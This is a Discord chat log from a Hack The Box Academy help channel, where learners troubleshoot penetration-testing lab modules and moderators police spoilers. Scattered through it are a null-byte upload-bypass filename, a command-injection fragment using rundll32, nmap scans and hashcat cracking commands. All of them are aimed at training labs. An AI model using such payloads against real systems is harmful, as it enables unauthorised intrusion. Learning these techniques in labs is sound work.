#modules

The aim of CBBH is to find vulnerabilities in websites. It is not about gaining root access to a server. However, this is usually required in CTFs. In this case, CPTS would probably be more suitable

Yeah, I had the same problem as this guy the tools were spitting out unreliable data for some reason

that discrepancy is mentioned in the module

@opaque walrus no spoilers please.

Mention the module, section and a brief question

Someone will reach out to you if they can

Arguably g0b i wouldn't consider it a spoiler as the text tells you the hosts (not what to do ofc, just the hosts)

It was just a description of the lab...

https://tenor.com/view/not-like-this-stare-no-nope-gif-16373672

If rdp is slow, use tcp vpn, change vpn regions, or just suffer

Fine.. just.. content being pasted like that

from modules over Tier 0

That's not ok

Unless i missed the screenshot

You did

Ah yeah no, sharing the specifics of host details is spoiling

But the general setup is fine

Spoiler was: Things are going to get interesting ! we are going to pivot and pwn internal hosts kinda

This is first time i saw such challenge. Mostly labs are standalone stuff

pretty cool!

is it normal that i can´t open the hud in the zap proxy?

i'm stuck on a exercice FILE UPLOAD ATTACKS > white list filters

so i'm sending the file that is vulnerable and it says successfully uploaded

but when i try to access it it says internal error

this is my filename : hello.php\x00.png

Please don't share too much

SPoilers for modules over Tier 0 are not allowed.

Read the channel topic

you can try it in your pc it doesn't work

Good evening. I am at “attacking enterprise networks” -> “exploitation & privilege escalation”. While I try to connect to the internal http network there are very slow interactions. Is there something that I did wrong ? Or any tip to make it faster ?

ChatGPT told be to try local port forward instead of dynamic. I haven’t done it yet though.

You shouldn't really ask for help with those modules..

Go back over the module / section documentation

u aren't allowed to ask for help in skill assessment?

I mean.. that one.. it's right at the end of the course

If you're needing to ask for help with that, by that point...

I'd advise going back over the content, and trying to get through it yourself, otherwise you're going to find the exam very hard

if thats your opinion then you are allowed to have your own opinion but if its against the rule then i get it, but dont delete my message because you think i shouldnt ask for help

I deleted it because you were going in the direction of providing spoilers.

You just need to accept that I'm afraid

okay anyone available to help question 1 skill assessmetn dacl attacks 2

feel free to dm

Better, thank you.

i think it might just be broken, gna reset the lab

fml

lol

@subtle mauve ... seriously

Do not spoil modules over Tier 0

Did you not see the entire conversation above?

I guess not

Gonna go scream at a wall I guess

I just typed the issue I was having and this is the channel it brought me 2. My bad

But what you typed spoiled content from a module over Tier 0

Read the channel subject

Read the ToS you agreed to

https://tenor.com/view/toast-gif-5463168119520839381

I already said my bad

mb too if I'm aggro

Tired, frustrated and don't get how people miss it

But ok

https://tenor.com/view/woo-okay-gif-22413361

Kinda funny, ngl

@ocean night do you have the answer to help me ?

or you just monitor make sure people dont spoil

Need help with windows lateral movement

Pls

I don't have an answer for you, and my job isn't to monitor

I just like hanging here

..and protecting our interests

@ocean night can I please DM you my question?

No, sorry @dense gyro

I can't help advise regarding content

Are we allowed to post question here?

Not the question itself but my question

If it's regarding a Tier 0 module, go for it

If it's above Tier 0, do as @jaunty vigil did above

Dunno where to go, not that many postings on forum also

Where can I ask for tier 3

You can ask in the style that gerbsec did above

You cannot post any spoiling content here.

If anyone could help with question 3 skills assessment NTLM relay attacks that would be awesome, just dm me.

<@&861185840277487616>

idk what that was

Wasn't watching

Phishing’s bot

(but I wasn't clicking it)

Aha, steamdouche

You should not click on unknown links either 😉

Hello I'm new and wondering if anyone can tell me the way to make the tools.list that is in the foundations setting up part?

Copy/paste

I'm probably missing something since I don't understand this. I could just copy paste that part but would it make the list or not do anything?

.list is just a text file

Ohh would it have a potential function? Or just to remember useful tools?

sudo apt install -y < tools.list iirc should work

I think I get the goal

But the tools.list they give is by no means comprehensive

Thanks for the info

I understand its to introduce this method thanks.

Not really to introduce the method, more the concept

hey guys
noob questions here, i am currenlty undergoing the pen tester path, i want to re-do a task have previously completed like getting a flag
if i click reset, will it only reset the machine and a new flag or reset all my progress in the penetration path

can't reset tasks. If you completed them once, they are done.. forever

so only the machine

The modules have static flags

It wouldn't be any good to have rotating/random flags for the learning content

thank you so much

okay
so if i reset a mchine my progress will not move from 21% to 19% right ?

ohh okay

nope. I think the progress only moves on when you complete a section (you know, when you completed the section/page) and not individual questions that you answered

Hi everyone, quick q:
Windows Privesc Module Assessment 1 - Machine has spawned but I can't reach it in any way. Pwnbox, local machine, changed the VPN server twice. Nothing is working. Any advice?

exactly the some problem here in the File Transfers Module

Last time this happened, changing the VPN server fixed the issue, but this time I can't connect in any way.

yes, i can't reach it too

i will do the question maybe tomorror ....

i create a ticket

I once had a similar problem, my tun0 interface was bugged and didn't get deleted when I restarted my vm, thus creating new corrupt interfaces.. might be worth checking your interfaces

I’ll try. But pwnbox is also not working, so definitely not that.

oh.. well never mind

Thanks for the suggestion tho!

It’s the only assessment left before the last module. Would love to get it done today.

oh damn, things are about to get serious

by last module you mean some cert?

You bet! Excited and terrified at the same time lol

yeah, totally feel that haha

I meant the “Attacking Enterprise Networks” module. It’s the closest thing to the actual CPTS exam I’ve heard.

But yea, I’m doing OSCP soon.

are you aware that the HTB team (m3ben recommended it) to the whole module blind? Like not reading the walkthrough and content but straight up going to the questions?

Yep!!! Recently learned about that. I’ll definitely do that.

the most people that pass the exam recommend take the module blindly

zephyr and dante are also recommended

can we get an update in password attacks - password mutations module? the task at the end takes way too long for a little demonstration of the method... over 94k entries... shortened to 50k after considering password min length of 10...

Why are you assuming the min length is 10?

got it and yeaaa, wasnt min 10 haha

but still, going through those takes A LOT of time

I mean it's more "realistic"

I mean yeaaah.. but 926 mutations of a SINGLE password is kinda too much imo

for a lab

patience is a virtue ¯_(ツ)_/¯

but not in the lab 😭

Cracking and bruteforcing passwords is all about patience

but if you have done something wrong it will take very long time to figure out :=

@burnt swallow This isn't a hacker4hire server; read the #rules

Yes but i just want to know what i can do with it

nothing that would be legal.

also this channel is for assistance with academy modules, not "how do i hack someone that hacked me"

Hello, and tip on Windows Privilege Escalation Skills Assessment - Part I? I'm getting "Ping request could not find host rundll32.exe. Please check the name and try again.
Address:
"

ping request

🤔

that means the thing running ping took rundll32.exe as it's argument

and tried looking it up via dns

Ping request could not find host ;rundll32.exe. Please check the name and try again.

so: something is wrong with your payload

It wasnt for that it was for my report to get my accound back, to be more precise, 😭 but alr

if it's to get your htb account back: then leave that with support via emails. It has no business in the discord

if it's an account that has 0 to do with HTB; then it really doesn't belong in the discord

Alr mb

this is probably the thousandth time that i've had to tell people:
your account isn't truly your account, it still belongs to the company/product that you created the account for, this is true for nearly ANY service. Any issues you face with the account is to be resolved with the company/service, as hacking "your account" is still not legal. (not to mention there's virtually no way to verify that it is in fact your account).
All companies/services reserve the right to restrict/ban/delete your account per their ToS.

👌

Got it thank you

Good evening all. I am trying to get through the file transfers module, and am trying to complete the second portion "Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer." I downloaded the provided zip file to my computer. I cannot figure out how to transfer it straight into pawnbox (the link to download is directly under the question, but if i inspect it, there isn't a link i can paste into the browser in pawnbox). i tried navigating to the page in pawnbox, but it wants me to log in there. I tried unzipping the provided file, copying the text, creating a text file in pawnbox, and then zipped it, and separately made a copy that i tar.gz'ed. i then scped them onto the target machine, ssh'ed there, used the gunzip command in the hint, and ran hasher, and my answer is incorrect, so i'm thinking i need to not unzip/copy/paste/rezip etc because somewhere in all of that clearly i'm changing something in the content. So, how can i transfer the zip file from my computer to pawnbox? (this is also a dedicated lab/enterprise modules, which might be why it's asking me to log in)

You either use your VM or the pwnbox not both. If you're using the Pwnbox just download the file from the link straight within the pwnbox, then transfer from there.

Hi - so that's where i'm getting stuck. download "straight from the link" within pwnbox, but pwnbox is requiring that i log back in. Is that normal?

& i can't log in because it says my company has turned on SSO, but then also doesn't recognize my university's domain...

are you trying to log into htb from the pwnbox?

yes- because if i paste in the link for where the download file is, it then asks me to log in.

the resources shouldnt need you to log in to download them

have you tried curl or wget

that's why i'm asking for help. I'm sure i'm overlooking something.

did you right click and copy the link of the file?

when i right click there is no option to copy the link. there's only save as, inspect, source...i'm trying it with wget from within pwnbox now.

are you clicking the green zip button?

the green text. mine doesn't have a button.

is that enterprise?

it is.

mine is a button so there might be a link in the source for you to copy

ah! okay. lol. i got it transferred. wget worked. annnnd gunzip says it's not not in a gzip format so i'm right back to where i was.

just try normal zip

the target host doesn't have zip, and the hint suggested gunzip (with specific syntax). i'll figure out what this host has and keep trying. 🙂

unzip :p

it's been a hot minute but i seem to recall that working

does anyone know why smbmap dosent work but smbclient does?

oh bc of it dosent support null auth?

Pretty sure you'd need to provide some credentials for SMBMAP even if it's just for listing, try anonymous bind which is no password& no username

anyone else having a really bad connection tonight?

i have changed VPNs and reloaded the target, still having 30sec + response over ssh

no issue here. did you try changing regions?

hi all, could i DM anyone about the syntax of my payload for the XML section of advanced deserialization attacks?

I'm currently working on the HTB Academy – Prompt Injection Attack module, specifically the Skill Assessment titled: "Obtain the flag by getting the CEO banned from their own website."

I've managed to complete most of the steps and I believe I'm really close to the solution. I’ve already found the admin key, but I’m stuck on the final part and can't seem to figure out how to actually get the CEO banned and obtain the flag.

If anyone has done this assessment and can give me a nudge in the right direction (without full spoilers), I’d really appreciate your help!

Hi everyone 👋

I am currently on the penetrating testing path

I am currently in password attacks and using the pwnbox for solving the labs, how do I download the course resources in the pwnbox ?

Nevermind got it 👍

introduction to digital forensics
rapid triage examination & analysis tools

im on the part where they explain the general rules for timestamps in the NTFS file system. in the table for file access operation, it is noted that the accessed timestamp is no* but under the table in the text, it says the accessed timestamp is updated tor reflect the time of access i assumed the asterick to the no means like maybe it differs case by case? can someone explain :o or if i missed anything

not too sure if this is leaning towards spoilers for the module or not tbh, please delete if it is

I’m working through the HTTP Attacks module doing the Exploitation of Request Smuggling exercise, I have confirmed CL.TE vulnerability, used the basic payload from the course, add the additional parameters in the smuggled request and added my current cookie. But the Admin never hits the page or execute the payload. Can someone help me with this?

DM me

how far should I get into academy before starting to solve HTB challenges/machines

im half way done through the foundations path and I am going to start the bug bounty path right after.

how much should I finish before I am able to start actually solving easy CTFs/machines?

it all depends on how you tackle the content, if you look at the content as something to complete, it can take longer. If you look at the content as a way to build your methodology and understanding, then it won't take long at all

a lot of the easy stuff is a few quick google searches away

I (personally) feel that the boxes vary quite a bit in how guessy they are (that might have improved, has been quite a long time for me since I really did any), so you might be unlucky with one, while easily doing another

Hello All - I just started htb and enjoying the same. Everytime starting VM and accessing the same from interactive session is not comfortable. Is it possible to access pawnbox from the Kali/Parrot linux installed in my local machine? Thanks in advance

You can use the VPN and get access to the network that way

Hi guys I am doing the modules for cpts path and am stuck in getting started in nibbles can anyone help me

Thankyou for rapid response. I have downloaed the VPN file academy-regular.ovpn. Are there any instructions to configure this on my Kali?

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

Thanks again

Can I DM

yes plesase

https://0xw1ld.github.io/htb/2025/02/14/Nibbles.html

-# shameless self-plug

They have their Walkthrough on it but it's isn't running

What do you mean it isn't running? Need waaaay more information

Hi everyone, I'm currently on the 'Intrusion Detection With Splunk (Real-world Scenario)' and I just need clarification for the second question. I was able to find the answer as part of the CallTrace of a rundll32, but this one was using a lowercase 'system32' whereas the one with UNKNOWN segment in its CallTrace was in 'System32'. Was this an intentional part of the question? Sorry, I'm not sure how much detail I'm allowed to talk about.

I can share with you how I approached this if you need. DM if you want.

Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment

on the last question it says

Connect to the StarLight-Protect Wi-Fi network and submit the flag found at 192.168.3.1.

worth 0 points but for some reason im unable to connect even tho i have the password

Bloodhound. For the first time I have experienced problems with bloodhound-python, “channel-binding” errors when using it in HTB modules. Anyone have any tips on how to make it run? Will try using the —ldap-channel-binding flag once back from work but not sure if it will have any effect

I've generally just been using netexec to pull bloodhound data and haven't had any issues there.

You mean just running —users, —groups and such?

https://www.netexec.wiki/ldap-protocol/bloodhound-ingestor

No there's bh via ldap. Check their wiki

Wow didn’t know that, will check it out, thanks a lot!

Looks like rk10 posted a link for ya in case you missed it.

nvm figured it out, i got a false positive

Thanks! I’ll check it out 👍

👍

in the wordpress module there is inlanefreight.com ... and i get ip adres of the same.... what do i dont see? bc i have the admin pass. and i login the .com its not allowd. when i login on the given IP adress i dont get any Wordpress settings. any 1 can help me a bit ?

Just for general knowledge. There are multiple ingestors like RustHound/SOAPHound etc. You can also use something like ldapdomaindump and convert output to use with BH as well as things like ADExplorer etc. So there are many alternatives to generate appropriate .json files that you can later import.

Yeah I read about it. Thing is, ldapdomaindump and ldapsearch works fine for collecting data, but b-p fails (in this case), so will also try the option to convert json output to bh format. Was just surprised that b-p failed. Thanks for comments and info!

one basic doubt. generally most of the systems deploy password policies like threshold for number of invalid passwords. if i give five wrong passwords, systems will lock the user. Our brute force tools like medusa, hydra will try reduced set of common passwords (still they are around 200). Any same system will not allow this kind of brute forcing. Then what purpose these tools are serving?

Password spray, a lot less risk of locking accounts by bruting the accounts instead of the password. This is mentioned in AD enumeration & attacks module

I have a question regarding the Wi-Fi Evil Twin Module. Has anyone actually done the Assesment at the end? I managed to get the last question right but not the first two. I have litteraly tried everything and it wont work. On the first question there is a hint that says "Interception", i thought that well the only part where this word is mentioned is the SSL Interception section. Well, guess what? If you try to replicate that exact attack it still wont budge. So my question is has anyone managed to figure this and is able to help me out. I would appreciate that .

This is what i get "
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
" but its the Skills Assessment - WordPress
so what goes wrong?

Double check if everything is fine with URL you provided, can also use --force (Do not check if the target is running WordPress or returns a 403) / play with --detection-mode / use --random-user-agent

yeah i tried all 😦 still not . Ping is working, site is uo

Which section is it?

last 1 Skills Assessment - WordPress

My notes showing me that there is a subdomain/vhost -> blog[.]inlanefreight[.]local. You sure you added it to /etc/hosts and pointing WPScan to a right direction?

yeah, i will start over from 0 and see what goes wrong

Anyone??

Hi

I am doing the scf smb share attack, when running responder I am getting this error

try without the r in -wrf :)

-wrf is a combination of -w, -r, and -f

i did but now

are the flags different in current version?

I'm almost sure you can run without this flags at all, just with -I

Shameless copy/paste from @foggy siren : I'm stuck at the RDP and SOCKS Tunneling with SocksOver RDP with this error message: "The module SocksOverRDP-Plugin.dll was loaded but the call to DllRegisterServer failed with error code 0x80070005. What am I doing wrong?

I already disabled the real time protection I try to load the x64 version. Already resetted the target. Still can´t load the DLL. Do i miss something?

after you disabled you need to make sure the dll exists where you drop it

Tried to get everything into one screenshot 🙂

Does the dll need to be registered with admin privileges? The modules only says that the socks server must be started with admin privileges.

//edit: registration works with admin privileges.
// edit 2: I see in the screenshot of the module that an admin cmd is used. I guess i will add something to #1234357888114364508 and ask for a little hint in the module that regsvr32.exe also requires admin privileges

Hi! Very first post on this Discord, hope I'm in the right place. I'm trying to complete last question in the Linux Fundamentals: Filter Contents module, but I can't get the Pwnbox to connect to https://www.inlanefreight.com/ via cURL. The connection always times out. What could I be doing wrong?

Try with -k -s

So, if I understand correctly, the -k waives the usual security? What does the -s do?

Guys hello I know it is a stupid question but have you done network enumeration with nmap?

Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.

-k skips cert check. use curl -h or --help to see more 🙂

You described the module/section but you have not provided what's your issue with the lab?

I give command nmap target ip -sS get 65535 ports but answer is incorrect and I am stuck what do they mean?

they asking about the total number of tcp ports

nmap -p- -sT --open [IP] should work.

Maybe with -Pn, not sure

let me try

can you tell me the reason why nmap sometimes is so slow?

Can anyone help me with the XOR ciphertext question from Hashcat module? I tried https://md5decrypt.net/en/Xor/ and putting it in \x format.

In real life it's the worst 😂 . When you have to deal with multiple /24 subnets (or with one /16 -> lol I got a headache even typing this)

yeah it is still scanning

Doing the pentesting in a nutshell model. Why does this keep timing out?

better use your own kali on vm or live pwnbox is usually bad for use

so its on the vm?

I guess skip updating the database will work

alr ill give it a try

How to use vs code

It's often worth a -T4 or a -T5 for a quicker scan then running a shower one later to pick up anything you missed.

Can't skip the update. It said its required.

Someone helped me

Guys nmap finished scanning but didn't list any output? Where is the output?

nmap -p- -sT -T5 --open 10.129.234.237
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 20:09 +04
Nmap done: 1 IP address (1 host up) scanned in 660.28 seconds

and that's all

trying right now))

could it be so that in virtual machine nmap is not working properly?

sU is about udp ports and I need tcp ports

the problem is that my nmap is not listing anything

scan results

no it doesn't work all

Try -Pn

#modules can anyone help me out on "introduction to NoSQL Injection at Skills Assessment II"?
any pointers will be greatly appreciated!

can someone follow me up on this?

Hello all. I'm new to HTB and to this channel. I did a couple of Sherlocks yesterday and was able to power through them. I am stuck on the "TeamWork" Sherlock and not sure if this is the place to get help. They are asking me to get the name of the file being shared by the advesary. But when I click on the link to get the file, there is a browser error saying DNS_PROBE_FINISHED_NXDomain as if the A record for the site doesn't exist. I can't complete this questions (and the box for that matter) without this information.

I suggest asking in https://discord.com/channels/473760315293696010/1172204822519349268. This is for HTB Academy modules support

I must of missed the Sherlocks channel. Thanks for pointing that out

trying right now. trying to guess why it gives no output for the scan. sometimes even tells that the host is down...

I have a little bit of time, if you are still stuck you can DM.

hello,
in the debugging section of the intro to malware analysis module https://academy.hackthebox.com/module/227/section/2496

i have patched the shell.exe and also opened the already patched one that is provided but i still get the "sandbox detected" window when i run the executable.

yeah ill dm you now

Hello! I am pretty new to this field, so be kind plz.... 😛 I am going through the "setting up" module is the InfoSec foundations path. I am trying to spin up a windows 10vm, but the link provided in the course no longer supports download... I found a legit windows working link by searching on here and I was able to create an iso by downloading "windows installation media" . Unfortunately I am getting an error message at the Booting stage (Timeout error/ EFI Network.... No Media). Am I doing something wrong or do I just need to pay 20$ for an installation key?

Anyone who's done the Enterprise Networks module up for a quick DM to explain something? I've had a look at the walkthrough, so I know what to do but I don't know how I was supposed to work it out.

you don't have to follow the module to a T

in intro to penetration testing, this question: """Which version of vsftpd is installed on the target system? (Format: x.y.z) """ but in the linpeas_results.txt file there isnt any vsftpd at all?

I believe you l they want the banner from port scanning, not linpeas.

hey im trying to run the command wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh, but its failing to connect, the module explicitly says to run this command, so im not sure whats going wrong

im doing this inside the pwnbox

Are you running the command on the pwnbox parrot machine, or the target machine? The targets have no internet connection.

parrot

Worked fine here

i have a fresh instantiation, so its even more weird

Can you ping google.com?

Are you using the Pwnbox, the in-browser VM, or your own Parrot, "Pwnbox", installation?

Sounds like dns issue

Isn't it always!? 🤣

im in the browser

(Or layer 8)

i can ping google fine

Free account? (Not bought cubes or sub?)

yes free

Then that may be why

The free pwnbox is very limited in internet access

i cant answer the questions without looking at the file linpeas_results.txt though :(

Use your own vm :)

ive never done that but i suppose i can learn

can you point me to a resource?

It's really not that hard to set up

There's a setting up module, and the popular distros all have basic guides to get you started

Hi. Where can I ask a question about Solar from Pro Labs?

Pwnbox is a custom branch of ParrotOS

#1263635449335910531 , read and follow #welcome to verify and access

#1263635449335910531

ok, ill give it a shot thanks

@fathom pendant @dapper moth thanks

Thank you. the target box also does not have unzip, and i can't put tools on it.

gonna be honest then i forgot how i did it then; it's been a hot minute

but i swear there was a way to unzip it in a simple way

If there is anyone who is willing to have a sidebar with me, i've now got all of the commands i've run trying to finish this linux file transfer module and it is still not resulting in the right answer. I am utterly stuck, and actually need to finish this for a class. I'm really hoping someone can see an error.

you can unzip then transfer it over unzipped

¯_(ツ)_/¯

i've also tried that, and still gotten the wrong answer. I'm utterly stumped, but think that the problem may be that i'm not actually successfully downloading the provided zip file into my attack box to begin with on pwnbox. i used wget, and actually got a file called the right thing, but it's content is html, not anything compressed or archived.

Of all the dumb things to be stuck on...this isn't even the point of the module lol

if it's getting an html file then it's not properly grabbing the file

i suggest instead to open network tab in browser; start the download in your host machine; go to network tab; click the download -> copy request

some things don't work well with the -> copy link

it depends on which endpoint the resource is held at

file transfer module yeah?

i'm sorry. i think my brain is broken. say what now? i can't navigate to the page where the file is saved on a browser in pwnbox at all. and yes, file transfer module, linux methods

hm

i can't tell how much of this is harder because i'm in enterprise mode. it seems like i should be able to do it that way.

i was able to right-click -> copy link and wget to my machine

right clicking i can't even copy the link

gimme a sec to see if i can double check on EP;

and i inspected the page source and it's not in there either. 😦

okidoke!

I'm trying to complete a module and I'm not understanding how the spawn rationing works on the free version. This morning when I checked, it said I had 1/1 spawn remaining so I planned to use it this evening. Now it says I have 0/1 and need to wait until tomorrow. What's happening here?

ok this may seem a bit convoluted but bear with me:
click the link => download the file => ctrl+j to open the downloads window for your browser (in chrome, at least) there should be a link icon to copy the download link that you can wget

reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

YOU are my hero. it worked.

i could cry.

yeah enterprise not showing the download seems a bit... ugh imho lol

hm

Thought we ditched the in memory / blob download method

definitely gonna throw that at #1234357888114364508 though(the system not having unzip); i just checked the writeup -- and it expects you to unzip then transfer. (the question implies you can unzip on the target host)

it's under the storage space

Certain we moved some in-browser download and blob download triggering to be off of a CDN

and thought it was applied to Academy too

but perhaps I am mistaken

a lot of the download stuff is under the /storage/ endpoint (if it's not under the >resources< button)

Am I misunderstanding the problem?

maybe

the problem they were having is they couldn't get a link to wget the file in the first place, regardless of where it's hosted

the enterprise platform opens a new tab to download, whereas the regular academy just allows you to right-click and copy link. Most browsers now though allow you to copy the download link location

[note the source says from enterprise, but the actual link is actually to the regular academy endpoint]

Ok yeah, must still be differences in the EP academy integration

A /feedback certainly wouldn't go amiss

..but know there's a lot in progress atm

my critique is mostly on the fact that the question from the section implies the target host has a way to unzip the upload_nix.zip, it doesn't (tar -xvf errors)

huh

but, it's a zip?

Oh, no unzip bin?

nerp. even the official solution says to download the zip file and unzip on their local machine then transfer

Weird, got no response. Not even the AI chatbot.

That's regarding the Pwnbox, our in-browser workstation

You will still be able to spawn the targets

yeah they were saying they had 1 spawn earlier, didn't use it (i'm guessing) now they have no spawn

¯_(ツ)_/¯

Exactly

Understood, I mis-read what was said then, mb

annnd now i forgor what i was doing

Looks like you spawned on the 22nd just before the servers midnight

What I'm seeing our side anyway, not sure support will be able to say anything in addition tbh.. but see what they say in the morning when they are back online

What time zone are the servers on?

Sorry, just after 0100 yesterday, not midnight

So you've a few hours until your next credit

UTC

Gotcha. I'll keep that in mind. Maybe the page I was looking at wasn't refreshed? I don't know why else it would show me as having available spawns when I didn't.

probably a caching issue

Hmm, possibly

Not sure to be honest, but certainly mention on your ticket

That kind of time sensitive things should be cached with their time limits taken in to account though

should

depends sometimes; i've had labs timeout because it didn't update the timer (though i think there's a polling update that should update it, it does sometimes get missed)

Cache lifetime defined based upon the regularity of data change, so any changes to a long lived cached object sh ould be invalidated when a change impacts it

e.g. change in last spawn time of pwnbox

Again... should

Taking a note

Hi guys I hope you are okay. I'm in the Cracking passwords with hashcat module in the hybrid section where they ask me to decrypt a hash with a mask. I made the identification with hashid and identified a SHA1. I used the seclist from this repository https://github.com/danielmiessler/SecLists unzipping Rockyou.txt and using these lines in the console to decrypt the hash echo 978078e7845f2fb2e20399d9e80475bc1c275e06 > hash5.txt hashcat -a 6 -m 100 hash5.txt /usr/share/wordlists/rockyou.txt '?d?s'. However, I get starus exhausted or it takes more than 5 minutes to decipher the hash. Has anyone used a different dictionary or can someone help me with a clue? I appreciate your help.

Anyone in the future doing the skills assessment for the active Directory bloodhound. Find the percentage of users with a path to global administrator. Use a cypher query and modify it to azure. Simple. Bloodhound will fuck you up, and waste your time

Lesson learned don’t ignore cypher queries. I will use them from now on. I’ve always ignored it and went to bloodhound

I will admit when I’m wrong

Grindr, they have pentesters that are on their grind. Download the app it’s a great forum

No, and not the server to discuss such things.

Owch

Evaporated

Supernuts doesn’t play

Just deleted the msg is all

Better than what tcm does they will just take your cert

Hehehehehe

So how does moderating work? Do you guys do it on shifts

How do you guys divvy up the work and moderate? It seems like a lot of work to just sit and moderate a chat. I’m genuinely curious.

A better discussion for #general but no, no shifts or anything. Just online whenever.

#1341071199773655060 message

Looks like someone got stuck at a similar spot as me right now.
Not sure if they came here? Having trouble answering a question in the Web Recon module, though I am positive I got it (the "Solutions" show me a screenshot of the page I'm supposed to visit on WayBack, censoring the answer, and that's right where I'm looking)...

Gonna sleep on it, but if someone has an idea ^^

hi all, for advanced deserialization attacks xml section, i am very confused on where to add the string for the Type class generated from AssemblyQualifiedName in csharp. I am able to follow the module perfectly until 'Exploiting TeeTrove' section.

If anyone else is facing similar issue, make sure to add checks according to hints inside try - catch block where the main function is being invoked, otherwise it didn't work for me

@idle sundial I deleted your post because it contains spoilers. If you still need help with the module, send me a dm

you can DM me

i got it just like 2 minutes ago.. QQ lol after a couple of days. had a huge misunderstanding

just finished this. you will want to run a command once you get on the target to find the versionr ather than looking at the linpeas output for it

hello anyone here?

https://nohello.net/en/

im not attending the Introduction to Windows Command Line

no i have a problem
i wish i was just hello

anyway
in one of the section it talked about scheduled tasks
so i made one but it does not do its job even when i run it manually

C:\Windows\System32>schtasks /query /tn move_these_pics /v /fo list

Folder: \
HostName:                             AHMAD_23
TaskName:                             \move_these_pics
Next Run Time:                        N/A
Status:                               Queued
Logon Mode:                           Interactive only
Last Run Time:                        4/23/2025 11:56:46 AM
Last Result:                          0
Author:                               AHMAD_23\ahmad
Task To Run:                          cmd.exe /c robocopy C:\Users\ahmad\Documents\MEGA\obsidian C:\Users\ahmad\Documents\MEGA\obsidian\pics *.png /XO /MOV /XC
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          ahmad
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

this is it and idk what is wrong

can someone help pls

quick update

it only run when the laptop is on charger

also how to fix

i'm working on the tcpdump fundamentals labs but the right answer doesnt register as correct and keeps saying its wrong what are some known fixes? ill add a screenshot

Looks like its got "stop on battery" mode on

yea i was googling about this
i need to turn it off

thx

Hey i tried running nmap -sS stealth scan without mentioning sudo in the kali linux OS and it is running Stealth scan without requiring sudo privileges but in the "Network Enumeration using NMAP" module, the author mentioned nmap stealth scan requires raw socket privileges to perform scan. In my case, how it is working? i was really confused and i asked chatgpt about it and it responded to check if nmap binary has suid bit assgined and it was also not assigned.

run sudo

did you run "sudo su" in the beginning? Or is your user in the "root" user group? Regardless, the reason why the author mentioned sudo, is because (correct me if I am wrong) sudo privileges are required to send raw tcp packets (without completing TCP Handshake)

Turns out you should probably copy-paste instead of type. That letter was not what it looked like...
https://academy.hackthebox.com/module/144/section/1256

android fundamentals:

Hello, I'm currently working on the "Shells&payloads" module's live engagement, I'm a little ashamed to ask this (but hey we're here to learn) and I have no clue on how to access a web page (from the foothold box, not from the pwnbox) without any web browser installed on the machine. Am I missing something here ? (I tried xdg-open with the address, but I just get the source code of the page and it's not very helpful).

na but like im asking how do i know that im not trying a machine that requires using tools/methedologies I haven't learned about yet

type firefox & in the terminal

If you have pivoting knowledge you can also establish a tunnel and use the browser on your own pwnbox/vm

OMG! I've been searching in the menu to launch it from there for several minutes. Thanks a lot! 😅

Yes I know tunneling is possible but I don't have the knowledge yet

you will almost always run into something you haven't learned yet

then how am i supposed to solve the machine💀

the same way others solve active machines: research

:P academy doesn't cover every single topic and vulnerability

There's a certain balance to it. You will certainly need to develop the skill to do research, but if you don't even know where to start, that doesn't help. I've been there, just opened up a box with zero prior knowledge, and it does not help at all

but they cover enough to build you up with the research skills

half of our job is googling

this is why i put in the caveat to my initial message:

• If you look at academy modules as something to just complete, you're cooked
• If you look at it as a way of building your methodology and understanding, you're gonna do better

Personally I read a few walkthroughs to and spend a lot of time in Academy, still do. You get a sense for generall concepts you need over and over again, so starting from there, you can build your knowledge further and try to apply it on active machines

then still the question remains, when do i know i reached this "balance" point

trial and error I'm afraid.

i wouldn't rely on walkthroughs (especially for academy content)

im not looking at it as something to just complete. i just dont know when i have learned enough to start with beginner machines and not be wasting time

or demotivating myself

yes I meant walkthroughs of machines. I tried some that went way over my head, looked how other people solved it

reading walkthroughs isn't inherently bad; it's just how you use it

as long as it's not active content

if you're worried about when you'll be ready, you'll never be ready

Generally: you don't unless you actually try the labs every so often, while it's ok to use official writeups you'll notice a certain point when you have developed a methodology and can do boxes with less and less help needed

I think that captures what I meant by trial and error.
Just give some machines a whirl, and you'll keep failing until one day you don't.

For me it's literally about exposure sometimes. It makes more and more sense over time

reframing how you view it is important as well

I still consider myself pretty much a noob, just as a disclaimer by the way ^^

sure it may take you a few hours or days to solve a box: but at the end you learned something

I can tell you that even after working in this field you still won't be feeling "ready". Research and googling / trying / failing is part of our job, doesn't matter in which cybersecurity domain you will end up being.

you should concern yourself with speed after you've gotten a hold of the basics

same

if you're worried about completing the boxes as fast as the extremely skilled people that get bloods, then you're trying to climb a steep hill without any practice

They blood user in 3 mins while I'm still spawning the box in 3 mins

the modules teach you, in part, the methodology to identify the weakness -- not just that a weakness is there

Maybe "balance" was not the best way to put it, I just meant to express that I felt like being in a very similar spot.
If the first thing on HTB is spawning a machine, even from starting point, if you've hardly even ever seen a Linux CLI (as myself a few months ago), then you're not gonna have a good time.
But you don't have to finish every last Academy module either to get started.

I'd really say to try it out. Maybe stick to some paths in Academy (another mistake I made, I kinda randomly took modules that didn't mesh well / went way over my head at first), and you're gonna get more and more comfortable.

Wishing you a great journey either way, you got this, and most importantly: enjoy the ride

will defo try this

ill finish fundementals and do some modules from the CBBH path and ill try some boxes from there

Agree, highly recommend doing the InfoSec Foundations Path and at least the Cracking Into HTB or Getting Started or Pentest in a nutshell modules

-# I've only really done the Getting started module but have heard good things about the other two

thank you everyone for the help. yall the 🐐 s

you got this!

Tho its not usually this slow are there ongoing server issues with spawning targets?

